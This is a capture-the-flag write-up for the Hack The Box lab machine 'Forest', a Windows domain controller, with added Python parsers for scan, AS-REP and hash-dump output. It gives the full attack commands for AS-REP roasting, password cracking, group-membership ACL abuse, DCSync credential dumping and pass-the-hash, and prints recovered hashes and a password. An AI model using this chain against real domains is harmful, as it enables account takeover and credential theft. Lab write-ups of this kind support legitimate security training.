Forest
Personal Rating: Medium
This box was rather easy at first as I just recently completed the HTBA Attacking AD and Windows privilege escalation modules. However, the ACL abuse to Domain Admin was tedious and hard to get to work.
Enumeration
Running an nmap scan:
sudo nmap -p- -sV -sC <IP>
Note that this scan is extensive and not stealthy, which might not be feasible in a real pentesting engagement.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 12:33:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
This looks like a DC from the open ports. There is no webserver.
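As an added example (not part of the original write-up), the heuristic above expressed in Python: a parser for nmap's normal-output port lines that treats the combination of Kerberos (88), LDAP (389) and Global Catalog (3268) as the domain-controller signature and pulls the domain name out of the LDAP version string. The sample lines are constructed from the scan above.

```python
import re
from typing import Dict, Tuple

# Constructed sample: a subset of the nmap -sV normal-output lines above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 12:33:23Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
"""

# port/proto  state  service  [version...]; \s+ also covers nmap's column padding
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Ports that together mark an Active Directory domain controller.
DC_PORTS = {88: "kerberos", 389: "ldap", 3268: "global catalog"}

def parse_ports(scan: str) -> Dict[int, Tuple[str, str]]:
    """Map each open TCP port to (service, version string)."""
    ports = {}
    for line in scan.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(2) == "tcp" and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(4), m.group(5))
    return ports

def looks_like_dc(ports: Dict[int, Tuple[str, str]]) -> bool:
    """True only when every DC-signature port is open."""
    return all(p in ports for p in DC_PORTS)

def ad_domain(ports: Dict[int, Tuple[str, str]]) -> str:
    """Domain name nmap reports in an LDAP version string, or '' if absent."""
    for _, version in ports.values():
        m = re.search(r"Domain:\s*([\w.-]+)", version)
        if m:
            return m.group(1)
    return ""

if __name__ == "__main__":
    open_ports = parse_ports(SAMPLE_SCAN)
    print(sorted(open_ports), looks_like_dc(open_ports), ad_domain(open_ports))
```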
SMB Null Authentication
Null Authentication seems to work:
poetry run crackmapexec smb 10.10.10.161 -u '' -p ''
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\:
But I could not enumerate shares with this method.
LDAP Enumeration
Running a scan against ldap was successful:
sudo nmap -n -sV --script "ldap* and not brute" 10.10.10.161 > nmap-ldap.txt
The lockout threshold is 0, so brute-forcing user passwords would be viable.
I could enumerate some groups, but that is not interesting at the moment.
Using windapsearch I could fetch more information:
python3 windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" > ldapinfo-windapsearch.txt
The resulting file was massive with nearly 8000 lines.
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Using DN: DC=htb,DC=local
<SNIP>
I could enumerate the users and groups though:
python3 /home/user/Documents/windapsearch/windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" -U | grep sAMAccountName
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Remote Desktop Users
<SNIP>
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
sAMAccountName: test
Before trying a password brute-force or spray, I want to enumerate for Kerberoasting and AS-REP Roasting.
I did not find kerberoastable users with GetUserSPNs.py.
AS-REP Roasting
An AS-REP Roast did work with:
GetNPUsers.py -dc-ip 10.10.10.161 -request htb.local/
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8a0ea34bea471b1532011ad9ed356eb0$434e5a983d1a2547c41eb1bee9b293b3d14ae7721c818e88e86fce349326e9c059433f821b6b16903c98a7075d035e6a64b3ad3baeef73282357f45d34c833ffd1a376a323e9f67ce3929727983f31a918632406648d91d9edbe7061e6ab42c4c0b3f58b4af1fd15b5c0fbfafca0d6bb1e00fcd9293fac9645d6e53109c3df2618e2aaa082bf294092ccbc3af41c0ea6a62b500423b0e875da6ce1930f35f467593761121ca55aecc113e483d5b46ae39b8c17ad5318d0a87ea2472f6bfed5bdc70d4a298af97337aa89c7966d12fdf50d30b4a8e71562068224726fdad5f9a4a9e88096989e
With
hashcat -a 0 -m 18200 <SNIP> rockyou.txt
I could crack the password for the user svc-alfresco: s3rvice. With these credentials I could access the host with
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
AMSI bypassing, which evil-winrm has an integrated module for, was not required here.
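As an added example (not from the original write-up or from impacket), a Python parser for the $krb5asrep$ line format shown above (hashcat mode 18200). It exposes the fields a defender cares about: the account that has Kerberos pre-authentication disabled, its realm, and the encryption type (23 = RC4-HMAC, whose key is the unsalted NT hash and is therefore cheap to guess offline). The sample line is constructed: user, realm and checksum match the output above, the encrypted part is shortened.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout GetNPUsers.py prints; enc part shortened.
SAMPLE_ASREP = (
    "$krb5asrep$23$svc-alfresco@HTB.LOCAL:"
    "8a0ea34bea471b1532011ad9ed356eb0$"
    "434e5a983d1a2547c41eb1bee9b293b3d14ae7721c818e88e86fce349326e9c0"
)

# Kerberos encryption type numbers (RFC 3961 / RFC 4757).
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum hex>$<encrypted part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)

@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: bytes
    enc_part: bytes

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES.get(self.etype, f"unknown({self.etype})")

    @property
    def weak_etype(self) -> bool:
        """RC4-HMAC derives its key straight from the NT hash (no salt, no
        iteration); AES etypes use salted PBKDF2 and are far slower to guess."""
        return self.etype == 23

def parse_asrep(line: str) -> AsRepHash:
    """Split one roast line into its fields; raise ValueError on anything else."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    return AsRepHash(
        etype=int(m["etype"]),
        user=m["user"],
        realm=m["realm"],
        checksum=bytes.fromhex(m["checksum"]),
        enc_part=bytes.fromhex(m["enc"]),
    )
```

On the defensive side, a line like this exists only because the account has pre-authentication disabled; clearing that flag and preferring AES encryption types removes the offline-guessing opportunity.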
Bloodhound Investigations
Now, since this is a DC and I can authenticate with a domain user, Bloodhound came to mind. The goal is to compromise the Administrator on the local machine, but in this case, this can be accomplished by gaining domain admin privileges. I like to run the SharpHound collector when there is no antivirus blocking it. Otherwise you might use the Powershell version and take further steps to evade AV with Powershell, like an AMSI bypass, heavy obfuscation, stealth options when running it etc.
I exfiltrated the collected zip file using smbserver.py on my machine and 'net use' on the target.
Checking Bloodhound, this path is the first one I looked into:

This cannot be abused right now, as I would need SYSTEM privileges on the host to use mimikatz, for example. But this one works unprivileged:

'svc-alfresco' is an indirect member of 'ACCOUNT OPERATORS'. We have to add ourselves as a member of 'EXCHANGE WINDOWS PERMISSIONS' and then abuse that group's WriteDacl right on the domain object.
ACL Abuse Path
I could add svc-alfresco to the target group with:
Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members svc-alfresco
The easier version of adding a user to the group is this:
net user john password123 /add /domain
net group "Exchange Windows Permissions" john /add
The Powershell version, possibly with a Powershell downgrade attack or encoded after an AMSI bypass, would usually be the preferred way here for stealth.
I tried abusing the ACLs for hours, but could not find a solution. This was it in the end, after adding the user john to the Exchange group:
python3 DCSync.py -t 'CN=john,CN=Users,DC=htb,DC=local' -dc forest.htb.local htb.local\\john:password
python3 secretsdump.py htb.local/john:password@forest.htb.local
I did not know the script DCSync.py before, and the other scripts I tried did not work. I also tried to do it LotL-style (living off the land) with pure PowerShell, but that failed too. The commands above yielded what I wanted, though:
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
Pass the Hash
With evil-winrm and pass-the-hash (-H) I could then access the machine as Admin.
evil-winrm -u Administrator -i <IP> -H '32693b11e6aa90eb43d32c72a07ceea6'
NOTE: The latter part of each dumped hash pair is the NT hash, which is the one used for authentication (and thus for pass-the-hash). The former part is the LM hash; it is the same for all accounts (aad3b435b51404eeaad3b435b51404ee) because that is the value stored when LM authentication is deactivated and no LM hash is kept.
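As an added example (not from the original write-up or from impacket), a Python parser for the pwdump-style lines secretsdump.py prints, applying the checks the note above describes plus one more: the LM field equal to aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, and an NT value of 31d6cfe0d16ae931b73c59d7e0c089c0 (the Guest line above) is the NT hash of an empty password, which an audit of such a dump should flag. The sample lines are the three from the dump above.

```python
import re
from dataclasses import dataclass
from typing import List

# LM field secretsdump writes when no LM hash is stored (LM hashing disabled).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password: MD4 of the empty UTF-16LE string.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}

# Constructed sample: the three lines from the secretsdump output above.
SAMPLE_DUMP = """\
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
"""

# <user>:<rid>:<lm hash>:<nt hash>:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

@dataclass
class DumpedAccount:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def builtin_role(self) -> str:
        return WELL_KNOWN_RIDS.get(self.rid, "")

def parse_dump(text: str) -> List[DumpedAccount]:
    """Parse every well-formed pwdump line; skip banners and blank lines."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(DumpedAccount(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts

def audit(accounts: List[DumpedAccount]) -> List[str]:
    """Findings a defender would act on: stored LM hashes and blank passwords."""
    findings = []
    for a in accounts:
        if a.lm_stored:
            findings.append(f"{a.user}: LM hash stored")
        if a.empty_password:
            findings.append(f"{a.user}: empty password")
    return findings
```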
Since this machine is a DC, you could now use the krbtgt hash for the 'golden ticket' technique to obtain further persistence.